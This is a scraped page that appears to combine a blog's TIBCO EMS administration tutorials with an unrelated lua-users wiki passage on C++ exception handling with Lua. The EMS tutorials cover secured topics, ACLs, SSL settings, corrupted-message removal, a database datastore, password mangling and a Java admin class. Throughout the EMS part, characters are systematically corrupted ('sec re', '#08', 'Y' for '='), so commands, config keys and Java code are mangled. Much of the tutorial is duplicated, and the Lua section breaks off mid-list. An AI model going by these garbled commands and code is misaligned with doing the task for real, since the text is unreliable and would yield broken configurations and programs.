activit! inp t to the corresponding fields of S. .. 3n the Poll.'31#7#A-4? in the -estination Topic field.t?. The val e of the >transport? element indicates how the o tp t file is hosted.. A -esign Patterns? b! Thomas #rl.ile/ateway +ro0e.Dere we are* done. 8o here is a s mmar! that 3 hope to clear the mess 3 have introd ced. A 'ile=atewa! that broadcasts the file conversion event to interested parties. The patterns involved are: • • • • 'ile =atewa! -ata 0odel Transformation -ata 'ormat Transformation Part of 8ervice +ro:er 5LRL6 . !u--ary of .t 02JAN 1 Vote 3 realised some of the previo s articles describing the 'ile=atewa! are a bit haphaTard* n-organised at best. 'inall! we have completed a concept al 'ile=atewa! based on some of the design patterns described in >8. #08 .• Part of #nterprise 8ervice + s 5LR46 'ig re 1: Concept al Architect re of 'ile=atewa! Dere is a s mmar! of articles to follow: • • • • Part 1 Part 2 Part @ Config re T3+C. .e. This article describes the steps to set p the #08 for that p rpose.1 for T3+C. .0#VUbinUtibemsd.0# for win@2 installation is c:UtibcoUemsUA. #08 installation 5windows6.e.t article* we will add a new feat re to the 'ile=atewa!.1.confPfile -EMS5(OME-=#in=ti#ems&*e2e -con%ig %u00pat15to5'our5ti#ems&*con%5%i0e .o-+letion e)ent 02JAN 1 Vote 3n o r ne.e -config f llpathPtoP!o rPtibemsd.e need: • • • • a sec red topic an #08 ser a thoriTation enabled #08 access control list 5acl6 Before you start 8tart #08 server.ec te tibemsd.ast .simpl! e. 1. #08 A.ile/ateway to broad. The defa lt #08PD..e in the bin folder of !o r T3+C.Configuring TIBCO E*! for . V#08PD. . Ass ming !o have not changed the admin password* login as admin with no password.e 1.e.0#VUbinUtibemsadmin.e.1a nch #08 admin console. and se. 3n the same director! of tibemsd.e -EMS5(OME-=#in=ti#emsa&min*e2e Connect to #08 server . V#08PD.e. #08 Administration console* enter the command >connect?.e* e. Creating a to+i.ec te the tibemsadmin.uring it .3n the T3+C. .conf file.E?E!. 'or that reason we will create a ser called >fgw ser? with the password >fgw ser?. 1. create topic '=.. 1. 1.'31#7#A-4 to which the 'ile=atewa! will p blish its file completion events. a thoriTation Y enabled aut1oriBation = ena#0e& 8erver restart is re) ired if this method is sed. #nter the following commands into the admin console. . To enable a thoriTation on #08 server* enter the following command at the admin console. #nter the following commands into the admin console. set server a thoriTationYenabled set ser3er aut1oriBation=ena#0e& A thoriTation can also be t rned on via the tibemsd.@ secure To see the newl! created topic in the console* enter the following command. 1. G st to add a little sec rit! to it* we will sec re this topic b! allowing onl! a thoriTed cons mers to s bscribe* effectivel! bloc:ing the anon!mo s cons mers. show topics s1oA topics (ote the "K$ sign nder the col mn "8$* it indicates the topic is secured.. Creating an E*! user To access to sec red topics* the G08 cons mer needs to provide credentials when s bscribing.'31#7#A-4 sec re create topic F6>*F/.e will create a #08 topic called '=. Enable E*! aut(ori1ation The "sec re$ propert! of a #08 topic or ) e e will onl! come to effect if the server a thoriTation is enabled. show ser fgw ser s1oA user %gAuser Configure t(e a. grant topic '=.'31#7#A-4 . showacl ser fgw ser s1oAac0 user %gAuser !u--ary +! now we have config redCcreated the following: • A sec red #08 topic called '=..'31#7#A-4 s1oAac0 topic F6>*F/.7 1. (ote that in o r scenario* the cons mer is not allowed to p blish to this topic* hence the absence of "p blish$ privilege.ess . 3f the cons mer intends to become a d rable s bscriber* it also needs to be given the "d rable$ privilege.'31#7#A-4 fgw ser s bscribe* d rable grant topic F6>*F/.'31#7#A-4 topic needs at least the "s bscribe$ privilege in order to s bscribe to the topic...l3 The cons mer of '=.. #nter the following command into the admin console.@ .1..E?E!. create ser fgw ser >'ile=atewa! 2ser? passwordYfgw ser create user %gAuser )Fi0e6ateAa' User) passAor&=%gAuser 2se the following command to list the created ser. 1.ontrol list 2a.@ %gAuser su#scri#e" &ura#0e To inspect the privileges assigned to fgw ser* se the following commands 1. 1.E?E!. showacl topic '=. .0# for win@2 installation is c:UtibcoUemsUA.confPfile -EMS5(OME-=#in=ti#ems&*e2e -con%ig %u00pat15to5'our5ti#ems&*con%5%i0e .0#VUbinUtibemsd.• • • An #08 ser called fgw ser Access control on fgw ser #08 server a thoriTation Y enabled Tibco #08 Configuring TIBCO E*! for .t article* we will add a new feat re to the 'ile=atewa!.ile/ateway to broad. . #08 A.e in the bin folder of !o r T3+C.1.ast ..o-+letion e)ent 02JAN 3n o r ne.simpl! e.ec te tibemsd.e -config f llpathPtoP!o rPtibemsd.. #08 installation 5windows6.e. This article describes the steps to set p the #08 for that p rpose.e. The defa lt #08PD. V#08PD.e need: • • • • a sec red topic an #08 ser a thoriTation enabled #08 access control list 5acl6 Before you start 8tart #08 server.1 for T3+C. 1. e.0#VUbinUtibemsadmin. Creating a to+i. Ass ming !o have not changed the admin password* login as admin with no password. V#08PD.1a nch #08 admin console.ec te the tibemsadmin.e -EMS5(OME-=#in=ti#emsa&min*e2e Connect to #08 server . #08 Administration console* enter the command >connect?. and se.3n the T3+C. 3n the same director! of tibemsd.e* e.e.uring it .e 1.e. . create topic '=. . set server a thoriTationYenabled set ser3er aut1oriBation=ena#0e& A thoriTation can also be t rned on via the tibemsd. 1.. 1. Enable E*! aut(ori1ation The "sec re$ propert! of a #08 topic or ) e e will onl! come to effect if the server a thoriTation is enabled. #nter the following commands into the admin console.'31#7#A-4 to which the 'ile=atewa! will p blish its file completion events. 1. 1. a thoriTation Y enabled aut1oriBation = ena#0e& 8erver restart is re) ired if this method is sed. #nter the following commands into the admin console.E?E!. Creating an E*! user To access to sec red topics* the G08 cons mer needs to provide credentials when s bscribing.e will create a #08 topic called '=. To enable a thoriTation on #08 server* enter the following command at the admin console.conf file.@ secure To see the newl! created topic in the console* enter the following command. G st to add a little sec rit! to it* we will sec re this topic b! allowing onl! a thoriTed cons mers to s bscribe* effectivel! bloc:ing the anon!mo s cons mers. 'or that reason we will create a ser called >fgw ser? with the password >fgw ser?. show topics s1oA topics (ote the "K$ sign nder the col mn "8$* it indicates the topic is secured.'31#7#A-4 sec re create topic F6>*F/.. grant topic '=. show ser fgw ser s1oA user %gAuser Configure t(e a.. #nter the following command into the admin console.7 1.'31#7#A-4 s1oAac0 topic F6>*F/.. 1.E?E!.E?E!.@ %gAuser su#scri#e" &ura#0e To inspect the privileges assigned to fgw ser* se the following commands 1.. create ser fgw ser >'ile=atewa! 2ser? passwordYfgw ser create user %gAuser )Fi0e6ateAa' User) passAor&=%gAuser 2se the following command to list the created ser. showacl ser fgw ser s1oAac0 user %gAuser !u--ary +! now we have config redCcreated the following: • A sec red #08 topic called '=.'31#7#A-4 .@ . showacl topic '=..ess . 1.'31#7#A-4 topic needs at least the "s bscribe$ privilege in order to s bscribe to the topic.ontrol list 2a.l3 The cons mer of '=..1. 3f the cons mer intends to become a d rable s bscriber* it also needs to be given the "d rable$ privilege.'31#7#A-4 fgw ser s bscribe* d rable grant topic F6>*F/. (ote that in o r scenario* the cons mer is not allowed to p blish to this topic* hence the absence of "p blish$ privilege. periments with a fa lt tolerant set p sing the same server name in config ration option server as m! stand alone daemon.4.A instances r nning + siness.o E*! re. 8o m! first g es was to rename the #08 server* which did not help. 3 started a stand alone Tibco #08 daemon with the following command from the director! CtibcoCemsCbin: */ti#ems& -con%ig ti#ems&*con% 2nfort natel! 3 got the following error messages for m! stand alone #08 server: reconnect %ai0e&$ unCnoAn connection %or i&=DE reconnect %ai0e&$ unCnoAn connection %or i&=FD +efore 3 got this error 3 had done some e. . 8tart it with >tibemsd -config tibemsdssl.t failed 01JAN This note is tested with Tibco #08 4. . These clients were Tibco -esigner A. . 2012 in Tibco EMS Tib.1.hat might have ca sed it was that some #08 clients of the standalone server had crashed before 3 got the error.• • • An #08 ser called fgw ser Access control on fgw ser #08 server a thoriTation Y enabled Leave a comment Posted by SRIK on January 2.o E*! !ER ER 25FEB There is a sample 881 config ration !o sho ld start with in XtibcoPhome%CemsCXversion%CsamplesCconfig called tibemsdssl.onne. 2nfort natel! renaming the #08 datastore did not solve the problem either.or:s A. 0! standalone #08 server was also sing the same datastore as m! previo sl! r nning fa lt tolerant pair of #08 servers.conf. Leave a comment Posted by SRIK on January 1. 2012 in Tibco EMS !!4 Configuration in Tib. Ta:e a loo: at the properties.nl! when sh tting down m! machine 3 saw that these clients were correctl! terminated and at restart of the m! machine and the #08 server the problem was solved.conf?.4. :e!.Ht87Cpa/ LhoT:-lc#PrB<(<7r ] 8erver 3ss er certificate5s6.cert. proHect. proHect as an 3dentit! 5there is a 7#A-0# in the certs director! e.plaining the relationships6* and se serverProot.pem so !o can tr st the server.] 8 pports P#0* -#7 and P<C8]12. sslPserverPidentit! Y .p12 in !o r +..cert. sslPserverPtr sted Y .pem? as its identit!* adn it will tr st certificates that were signed b! clientProot.pem.cert. 2011 in Tibco EMS /e-s 2/ra+(i.pem sslPpassword Y SmanS.cert.al Ad-inistration Tool for E*!3 18FEB .The #08 8erver is sing the certificate >server.cert.cert.pem b! importing it into a Tr sted Certificates folder in !o r +. 8 pports P#0* -#7 and P<C8L..CcertsCserver..CcertsCserver.pectedPhostnameY ftPsslPciphers Y Leave a comment Posted by SRIK on February 25.pem 8oF!o can se clientPidentit!. There are also SSL properties for FT heartbeats: ftPsslPidentit! Y ftPsslPiss er Y ftPsslPprivateP:e! Y ftPsslPpassword Y ftPsslPtr sted Y ftPsslPverif!Phost Y ftPsslPverif!Phostname Y ftPsslPe.CcertsCclientProot.] This ma! be a part of P<C812 specified b! sslPserverPidentit! sslPserverPiss er Y ] Tr sted iss ers of client certificates.pem sslPserverP:e! Y . port to other tools s ch as #. ^1ogging. #gN p rging messages* cop! messages from a ) e e to another ) e e on a different server.. 3t can be sed b! G08 developers as a general p rpose test deb gging tool and b! administrative s pport staff as a management and monitorig tool. #nterprise 0essage 8ervice 5#086. 8electors and filters ma! be specified. 0essages ma! be sentCreceived* ) e es ma! be browsed and message contents inspected. ^C stomisable displa! and loo: and feel. ^8 pport for 0anaging and 0onitoring T3+C. =ems provides the following main feat res: ^8erver 0onitoring. ^Charting. 3ncl ding* general server config ration* G08 destinations* G(-3 factories* sersCgro ps* permissions* bridges* ro tes etc. ^G08 0essage 0onitoring. ^8ec rit!. 8erver statistics ma! be charted in real time* data ma! be saved to C8V files for e.2 =ems is a graphical ser interface tilit! for T3+C. 0essages ma! be monitored 5snooped6 as the! pass tro gh the server. 8erver state and main statistics are a tomticall! pdated* warning and error limits ma! be config red.cel. ^G08 s pport.* #08 A.. 8erver statistics ma! be logged a tomaticall! when warning or error limits are breached. 7e) est and repl! messages can be correlated to provide service response times. ^G08 0essage 0anagement. ^G7# 1. 8erver generated events are also capt red.* #08 B.A or higher Leave a comment Posted by SRIK on February 18. ^8erver 0anagement.=ems v@. 2011 in Tibco EMS . 8 b8tation 7e) ires: ^Tibco #08 4. 881 connectivit!* view onl! mode. ser admin -password admin12@ tibemsd _-config Xfilename%` _-ftPactive XactiveP rl%` _-ftPheartbeat Xseconds%` _-ftPactivation Xseconds%` _-sslPpassword Xstring%` _-trace Xitems%` _-sslPtrace` _-sslPdeb gPtrace` _-help` tibemsd -config c:UtibcoUcfgmgmtUemsUdataUtibemsd.ser` _-password` tibemsadmin.e -server >tcp:CCemshost:L222Z .conf Leave a comment Posted by SRIK on No e!ber ".rl%` _.t%` _-short` _-help` _-helpssl` tibemsmonitor -server >tcp:CCemshost:L222Z -monitor >%? tibemsadmin _-server` _. 2010 in Tibco EMS 5ow to (andle .orru+ted -essage in E*! datastore6 1O!T "roble# $es%riptio& .e.e. 3f !o r n this tilit!* !o can see ever! connectCdisconnect* ever! creation and destr ction of a 0essageProd cer and 0essageCons mer* ever! creation of a topic or ) e e.o E*! *onitoring 07NOV 3f !o are sing Tibco #08* !o sho ld be aware that there is a decent tool that comes with the Tibco 8-< that allows !o to monitor all activit! that goes on in !o r bro:er.e.ser Xname%` _-password Xpassword%` _-selector Xte.Tib. tibemsmonitor -monitor Xtopic% _-server Xserver. 3n the director! c:UtibcoUemsUbin* !o will find a command-line application called tibemsmonitor. hen a corr pted message is sent to a client and the client application cannot process the corr pted message properl!* the client will bloc: s ccessive messages sent to it. 'or e.conf trac:PmessagePidsYenabled. 'orced nmo nt of a ph!sical dis: when the dis: is in se* or a hard dis: in operation having been npl gged. 3f !o have alread! enabled the >trac:PmessagePids? then !o sho ld tr! to remove the corr pt message as follows. A. "ossible 'easo&s for (e&erati&) !orr*pte+ .7: Persisted message possibl! corr pt.essa)es i& the E. 8#V#7# #77.7: #. These messages will remain ) e ed on the server and will not be cons med b! the client. .. The machine was terminated abr ptl!. c6 .ception. failed.Hms. a6 2se the tibemsadmin command 5available in #08PDomeUbin director!6 to set server consolePtrace Y K08= 5or set logPtrace if that is more appropriate6. To enable trac:PmessagePids* in #08 main config ration file* set: in tibemsd. A hardware problem with the ph!sical dis:: 0edia error 2. 4.ception tr!ing to create valid messages record* 3nvalid message.hen !o r client tries to cons me the message* !o ma! get a >Hava. 8#V#7# #77. Sol*tio& .ception tr!ing to create valid messages record* 3nvalid message.7: #. .7: #.ample: a r nning s!stem in operation has been npl gged* etc. b6 2se the tibemsadmin command to set addprop ) e e trace. The #08 server receives a corr pt message. 8#V#7# #77.ception tr!ing to create message from store: 3.hen one or more messages are corr pted and a client cannot receive the corr pted messages* !o can do the following to delete the corr pted messages: 1.7: #.hen a message is corr pted in the #08 database* !o ma! notice the following errors in the #08 log file: 8#V#7# #77.ception: Corr pted incoming data message? e.ception tr!ing to read message from store. .G08#. 1oc:ing problem* the record in the db file has been modified b! different applicationsCthreads of the application at the same time. #77.hen the server delivers the corr pted message to the cons mer* the server sho ld print the message 3-. @..S $atastore 1. -ownload and install G-< 1.Har 26.. 4. The following steps have been tested on a .. -ownload and install Dibernate from the lin: provided at the #08 A. The! can be fo nd on the 3nternet.tibco. 'or e.indows host to config re #08 A. 3nstall #08 A. 2010 in Tibco EMS 5ow to Configure E*! 7$8 !er)er wit( 9atabase 9atastore6 1O!T #08 A.to remove the corr pted message.Har @6.ample: 16. 'or other platforms* the steps will be similar. 0icrosoft 8[1 8erver 0icrosoft G-+C -river for 8[1 8erver: s)lHdbc.racle Oi and 1Rg . with a database. 0!8[1 3nno-+ 0!8[1 Connector: m!s)l-connector-Hava-A.d6 2se the tibemsadmin command >delete message? with that message 3. -ownload the corresponding database G-+C drivers.A or later @.R.B-bin. The corresponding Har files for the G-+C need to be added to dbstorePclasspath in #08 main config ration file. .com. 2... download on http: download. e6 2ndo steps a6 and b6* if needed. can be config red to se a database to store messages. Leave a comment Posted by SRIK on #ctober $1. Set*p Steps: 1. tibco.RUbinUcglib-2.ample* in stores-db.RUbinUantlr-2. and se) ence.driver.B.HarNc:UtibcoU#08UA.2.hibernate.1..HarNC:UtibcoU#08UA.HarNc:UtibcoU#08UA.RPRBUHreUbinUserverUHvm.HarNc:UtibcoU#08UA. 0odif! the sample #08 main config ration file sed for database: c:UtibcoUemsUA.c@ pRPR.RUbinUoHdbc14.1.tpcl.O.HarNc:UtibcoU#08UA. Create database sers for #08 sage in the database.racle G-+C Thin -river: oHdbc14.HarNc:UtibcoU#08UA.dll YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY B.@.ample which ses the .conf* defines oracle database information: .HarNc:UtibcoU#08UA.1.Hdbc.B.A.HarNc:UtibcoU#08UA.tpcl.4.HarNc:UtibcoU#08UA.conf to p t !o r own database store information: #.RUbinUcommonscollections-2.dialect.RUsamplesUconfigUtibemsd-db. 3+0 -+2 8erver M.1 -+2 2niversal G-+C -river: db2Hcc.RUbinUdom4H1. L.RUsamplesUconfigUstores-db.org.RR1Uhibe rnate@.O.Har and db2HccPlicensePc .RUdatabaselibUoH dbc14.RUbinUHta.1 and O.racle 1Rg database: YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY dbstorePclasspath Y c:UtibcoUcomponentsUeclipseUpl ginsUcom.HarNC:UtibcoU#08UA.tibco.Har dbstorePdriverPname Y oracle.Har or oHdbcA.RUbi nUehcache1.1. The sers sho ld have permissions to create* alter* delete* pdate for table* inde.A.RUbinUasm.racle-river dbstorePdriverPdialect Y org.HarNc:UtibcoU#08UA. Dere is an e.RUbinUco mmons-logging-1.HarNc:UtibcoUcomponentsUeclipseUpl ginsUcom. RUbinUasmattrs.mchange.org.RR1Uc@pRR..Har 46. 0odif! c:UtibcoUemsUA.1.racle1Rg-ialect HrePlibrar! Y C:UHd:1.L.com.Har A.conf: 0odif! the variables: dbstorePclasspath* dbstorePdriverPname* dbstorePdriverPdialect* HarPlibrar! to reflect !o r own settings and database.1.R.2. @..hibernateP@. conf: T3+C.. #nterprise 0essage 8ervice 2ser$s = ide* Chapter A* entitled >7 nning the #08 8erver? for details abo t the schema e. 0odif! the file ) e es.port 8ee the T3+C.conf or topics. 2010 in Tibco EMS 5ow to !e. 8tart the #08 server sing c:UtibcoUemsUA.conf -createall -e.conf Leave a comment Posted by SRIK on #ctober $1.ample: Hava -Har c:UtibcoUemsUA.Ss!s.RUsamplesUconfigUtibemsddb.port tool.Har -tibemsdconf c:UtibcoUemsUA.conf: dbstorePdriverP rl Y G-+C271 dbstorePdriverP sername Y sername dbstorePdriverPpassword Y password .port the #08 schema into database: #. 2se the schema e.ample* in the file ) e es.failsafe t!peYdbstore dbstorePdriverP rlYHdbc:oracle:thin:adminfsCadmin12@aCCosrvP1:1A21Corclperf dbstorePdriverP sernameYadminfs dbstorePdriverPpasswordYadmin12@ M.) otes ma.port tool to e.* !o will need to define the following parameters in stores.RUbinUtibemsdP til.hen defining the database stores in #08 A.b!tesY1R0+*trace*storeYSs!s. 1R.RUsamplesUconfigUtibemsd-db.conf to define where the messages will be stored: #..failsafe O.ure t(e 9atabase Password in E*! 7$8 Configuration file6 1O!T . t password: YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY tibemsadmin. All rights reserved.t database password within the 271* !o can define the .racle service name 5aliase name6 for the database sing the following s!nta. 1.: dbstorePdriverP rlYHdbc:oracle:thin:a:Cbdbservice namec .ample* !o can r n the tibemsadmin command to mangle a clear te.The database password can be entered as clear te.R.t for two parameters: dbstorePdriverPpassword and dbstorePdriverP rl. #nterprise 0essage 8ervice Administration Tool. dbstorePdriverP rl .e.R V2L 4C2OC2RRM #nter phrase to mangle: Confirm phrase to mangle: SmanS-7VM441RHf:3<s@=#T2dmccA0Ps YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY 3n stores. That is* !o can se the tibemsadmin tool to mangle a database password and define the mangled password for dbstorePdriverPpassword. 8oftware 3nc.e -mangle T3+C.racle database* the 271 format is entered as following: Hdbc:oracle:thin:Ca:Cbremote database namec 3f !o don$t want to enter the clear te. 'or e.hen defining dbstorePdriverP rl for an . Version A. dbstorePdriverPpassword 4o can also se a mangled password for the dbstorePdriverPpassword. Cop!right 2RR@-2RRM b! T3+C.conf* !o can define the mangled password for dbstorePdriverPpassword: dbstorePdriverPpasswordYSmanS-7VM441RHf:3<s@=#T2dmccA0Ps 2. Hms. Please find the below code.admin. Call the AP3 sing a script from haw: E send mail when it e.IN CC CC The tibHms8erverAdministrator class is sed b! the tibHmsPerf0aster class CC to change vario s settings in the #08 server. I .-estinationN import com.[ e eN import Hava. I 'or more information* please contact s : I I IC import Hava. til.TopicN import Hava.tibHms. CI I Cop!right 2RRL-2R1R 873< 8ol tions Pvt 1td 3nc..ceeds.IN import Hava. Leave a comment Posted by SRIK on #ctober $1. 2010 in Tibco EMS 5awk rule for -onitoring :ueue 0O!T 4o can se the ems admin AP3 to get the ) e e stats and chec: against the flowcontrol val e to find o t if it e.Hms.This wa! !o don$t need to define db sername and dbpassword in the dbstorePdriverP rl parameter.tibco..Hms.. I All rights reserved.ceeds MRV. CC p blic class tibHms8erverAdministrator b TibHmsAdmin_` Padmin Y n llN 8tring ) e e Y n llN 8tring topic Y n llN CII I Creates an admin client on the specified server I and then wal:s an! ro tes to other servers creating I admin clients on the discovered servers as well. contains<e!5ri_i`.val es56.get27156* ser(ame* password* map6N c c else b admin.I aparam server2rl server 271 on which to connect I aparam ser(ame the administrator name I aparam password the administrator password IC p blic tibHms8erverAdministrator5 8tring server2rl* 8tring ser(ame* 8tring password6 b 0ap map Y new Dash0ap56N addAdmin5server2rl* ser(ame* password* map6N Padmin Y new TibHmsAdmin_map.p t5si.siTe56`N map.set8tatistics#nabled5tr e6N admin.get8erver(ame5666 b map.get7o tes56N for 5int i Y RN i X ri. pdate8erver5si6N if 5\map.get3nfo56N CC enable statistics si.toArra!5Padmin6N c private void addAdmin58tring server2rl* 8tring ser(ame* 8tring password* 0ap map6 b tr! b 8!stem.lengthN iKK6 b if 5\map.get(ame566 EE ri_i`.close56N c c catch 5#.isConnected566 addAdmin5ri_i`.println5>connecting as >K ser(ameK? to >Kserver2rl6N TibHmsAdmin admin Y new TibHmsAdmin5server2rl* ser(ame*password6N 8erver3nfo si Y admin.ception e6 .contains<e!5si.get8erver(ame56* admin6N 7o te3nfo_` ri Y admin.err. e.set'ailsafe5failsafe6N ti.length % 16N ti.+!tes5flowControl6N 8!stem. I I aparam name topic name I aparam failsafe failsafe setting I aparam flowControl flow control setting IC p blic void createTopic58tring name* boolean failsafe* long flowControl6 b tr! b Topic3nfo ti Y new Topic3nfo5name6N ti.createTopic5ti6N c topic Y nameN c catch 5#.print8tac:Trace56N 8!stem.set'lowControl0a.print8tac:Trace56N 8!stem.lengthN iKK6 b Padmin_i`.destro!Topic5name6N Padmin_i`.it5-16N c c CII I Create a ) e e on all servers.ception e6 b e.e.it5-16N c c CII I Create a topic on all servers.b e. I I aparam name ) e e name I aparam server name of ) e e$s home server I aparam failsafe failsafe setting .set=lobal5Padmin.err.println5>creating topic >Kname6N for 5int i Y RN i X Padmin. set=lobal5Padmin.destro![ e e5name6N Padmin_i`.set'ailsafe5failsafe6N )i. I I aparam dest the destination I aret rn the n mber of receivers for the destination IC p blic int get( mber.create[ e e5)i6N c ) e e Y nameN c catch 5#.setPrefetch5prefetch6N 8!stem.lengthN iKK6 b Padmin_i`.e.I aparam flowControl flow control setting I aparam prefetch prefetch setting IC p blic void create[ e e58tring name* 8tring server* boolean failsafe* long flowControl* int prefetch6 b 8tring f ll(ame Y nameN if 5server \Y n ll6 f ll(ame Y name K "a$ K serverN tr! b [ e e3nfo )i Y new [ e e3nfo5f ll(ame6N )i.length % 16N )i.println5>creating ) e e >Kf ll(ame6N for 5int i Y RN i X Padmin.f7eceivers5-estination dest6 b int n m7eceivers Y RN .it5-16N c c CII I 7et rn the n mber of receivers from all servers I for a partic lar destination.set'lowControl0a.+!tes5flowControl6N )i.err.print8tac:Trace56N 8!stem.ception e6 b e. lengthN c c catch 5#.is'lowControl#nabled566 flowControl#nabled Y falseN c c catch 5#.get[ e e(ame566N Cons mer3nfo_` ci Y Padmin_i`.it5-16N .print8tac:Trace56N 8!stem.get[ e e555[ e e6dest6.lengthN iKK6 b -estination3nfo infoN if 5dest instanceof Topic6 info Y Padmin_i`.get3nfo56N if 5\si.e.print8tac:Trace56N 8!stem.getCons mers8tatistics5n ll* n ll* info6N if 5ci \Y n ll6 n m7eceivers KY ci.ception e6 b e. I I aret rn tr e iff flow control is enabled on all servers IC p blic boolean is'lowControl#nabled56 b boolean flowControl#nabled Y tr eN tr! b for 5int i Y RN i X Padmin.getTopic555Topic6dest6.lengthN iKK6 b 8erver3nfo si Y Padmin_i`.ception e6 b e.it5-16N c ret rn n m7eceiversN c CII I Chec: if flow control is enabled for all servers.getTopic(ame566N else info Y Padmin_i`.e.tr! b for 5int i Y RN i X Padmin. get(ame566N c c c c catch 5#.e) als5info_H`.it5-16N c c c Leave a comment Posted by SRIK on #ctober $0.get[ e es5) e e6N for 5int H Y RN H X info.c ret rn flowControl#nabledN c CII I 7emove the destination from all servers.e.ception e6 b e.get(ame5666 Padmin_i`.destro![ e e5info_H`. IC p blic void clean p58tring controlTopic6 b tr! b for 5int i Y RN i X Padmin.lengthN HKK6 b if 5\controlTopic.print8tac:Trace56N 8!stem.get(ame566N c c if 5) e e \Y n ll6 b [ e e3nfo_` info Y Padmin_i`.lengthN iKK6 b if 5topic \Y n ll6 b Topic3nfo_` info Y Padmin_i`.getTopics5topic6N for 5int H Y RN H X info.lengthN HKK6 b Padmin_i`.destro!Topic5info_H`. 2010 in Tibco EMS . #nter all the details that is re) ired for #08 5Version* path of tibemsd e.0#CT7ACXversion that matches to r domain%C+3(C-omain2tilit!.indows6 or . 0a:e s re the T7A installalled on the machine where #08 server is r nning.S sho*l+ be *p a&+ r*&&i&)/ 1. domain and ne. Clic: Add #08 server to T3+C. Test the connection O.t. 'inish the rest 1R.To add E*! ser)er to TIBCO ad-inistrator. both A+#i&istrator a&+ E. 8top the #08 and start from T3+C. A.e. administrator.bin in ni.windows terminal li:e reflection*c!gwin or .6 @.CXPATD to T7A +3(%C-omain2tilit! (ote: To enable =23 mode in 2ni. 3n windows !o can do ble clic: the domain tilit!* b t in ni. follow t(ese ste+s% 20O!T Note: To a++ the e#s ser-er. Choose #08 administration from the men list. 7 n -omain 2tilit! from T3+C.ec table 5.windows properl!.windows etc. B.bin 52ni. . se .e in windows* .PD.6 L.e 5. 4. #nter the port n mber* ser name and password M. P t! does not s pport . 2.* !o r des:top m st have .e.
https://www.scribd.com/document/205210441/A-TIBCO-BusinessWorks
CC-MAIN-2019-04
refinedweb
9,452
70.9
[ Note: this page is somewhat of a work in progress. Additional comments are welcome. ] If you compile Lua in C, you must surround your #include <lua.h> in an extern "C", or use the #include <lua.hpp> equivalent, else you will get linker errors. // alternately do #include <lua.hpp> extern "C" { #include <lua.h> } Lua itself is normally compiled under C but may alternately be compiled under C++. If compiled in C, Lua uses [longjmp]'s to implement error handling ( lua_error). If compiled in C++, Lua by default uses C++ exceptions. See the declaration of LUAI_THROW in luaconf.h. See also LuaList:2007-10/msg00473.html . There is a mismatch between C++ exception handling that properly unwinds the stack and call destructors v.s Lua longjmps that merely toss the stack, so more care is needed if Lua is compiled in C to ensure all necessary C++ destructors are called, preventing memory or resource leaks. When C++ calls Lua as an extension language, the Lua operations often (but not always) need to be wrapped in a pcall to a lua_CFunction. For example, see [PIL 25.2] or PIL2 25.3. (Details on these conditions are given later below by Rici.) It's often the case that this lua_CFunction is used by only one caller. Therefore, it can be useful to make the lua_CFunction local to the calling function (like a closure). In C++, the lua_CFunction can be defined inside a struct like this: int operate(lua_State * L, std::string & s, int x, int y) { std::string msg = "Calling " + s + "\n"; // can raise exception; must be destroyed cout << msg; // caution: this code by raise exceptions but not longjump. struct C { static int call(lua_State * L) { // caution: this code may longjump but not raise exceptions. C * p = static_cast<C*>(lua_touserdata(L, 1)); assert(lua_checkstack(L, 4)); lua_getglobal("add"); // can longjump assert(lua_isfunction(L, -1)); lua_pushstring(L, s); // can longjump lua_pushnumber(L, p->x); lua_pushnumber(L, p->y); lua_call(L, 3, 1); // can longjump p->z = lua_tonumber(L, -1); assert(lua_isnumber(L, -1)); return 0; } const char * s; int x; int y; int z; } p = {s.c_str(), x, y, 0}; int res = lua_cpcall(L, C::call, &p); // never longjumps if (res != 0) { handle_error(L); // do something with the error; can raise exception //note: we let handle_error do lua_pop(L, 1); } return p.z; } Now, error handling is a bit tricky at first glance. The lua_getglobal, lua_pushstring, and lua_call calls can generate a lua_error(), i.e. a longjmp if Lua is compiled in C. The lua_cpcall, which is outside the protected call, is safe because it does not generate a lua_error() (unlike using a lua_pushcfunction followed by a lua_pcall, which could lua_error on memory allocation failure). Unlike C++ exception handling, the longjmp will skip any destructors of objects up the stack (often used for RAII in C++). Another issue is if lua_cpcall returns a failure result, what do we do with it? There is a possibility we could handle the error in-place, lua_pop it, and continue. More often, the error needs to be dealt with at a more shallow point in the call chain. Possibly a better solution is to keep the error message in the Lua stack, making sure to do a lua_pop if consumed in a catch block: #include <stdexcept> #include <boost/shared_ptr.hpp> /** * C++ exception class wrapper for Lua error. * This can be used to convert the result of a lua_pcall or * similar protected Lua C function into a C++ exception. * These Lua C functions place the error on the Lua stack. * The LuaError class maintains the error on the Lua stack until * all copies of the exception are destroyed (after the exception is * caught), at which time the Lua error object is popped from the * Lua stack. * We assume the Lua stack is identical at destruction as * it was at construction. */ class LuaError : public std::exception { private: lua_State * m_L; // resource for error object on Lua stack (is to be popped // when no longer used) boost::shared_ptr<lua_State> m_lua_resource; LuaError & operator=(const LuaError & other); // prevent public: // Construct using top-most element on Lua stack as error. LuaError(lua_State * L); LuaError(const LuaError & other); ~LuaError(); virtual const char * what() const throw(); }; static void LuaError_lua_resource_delete(lua_State * L) { lua_pop(L, 1); } LuaError::LuaError(lua_State * L) : m_L(L), m_lua_resource(L, LuaError_lua_resource_delete) { } LuaError::LuaError(const LuaError & other) : m_L(other.m_L), m_lua_resource(other.m_lua_resource) { } const char * LuaError::what() const throw() { const char * s = lua_tostring(m_L, -1); if (s == NULL) s = "unrecognized Lua error"; return s; } LuaError::~LuaError() { } Example usage: for(int n=1; n < 100; n++) { try { string s = "123123123123123123"; // note: may throw bad_alloc // ... int res = lua_cpcall(L, call, NULL); if (res != 0) throw LuaError(L); } catch(exception & e) { cout << e.what() << endl; } } There is also the case if Lua calls a C function that call C++ code that calls Lua code. In such case, the C++ code might pcall into Lua and convert any error message to a C++ exception, which propogates up to the C function. The C function then needs to convert the C++ exception to a lua_error() which longjmps to Lua. This conversion to a C++ exception is only needed if the C++ code in the call chain allocated memory in the RAII fashion. --DavidManura lua_pop, lua_gettop, lua_settop, lua_pushvalue, lua_insert, lua_replaceand lua_remove. If you provide incorrect indexes to these functions, or you haven't called lua_checkstack, then you're either going to get garbage or a segfault, but not a Lua error. lua_pushnumber, lua_pushnil, lua_pushbooleanand lua_pushlightuserdataever throw an error. API functions which push complex objects (strings, tables, closures, threads, 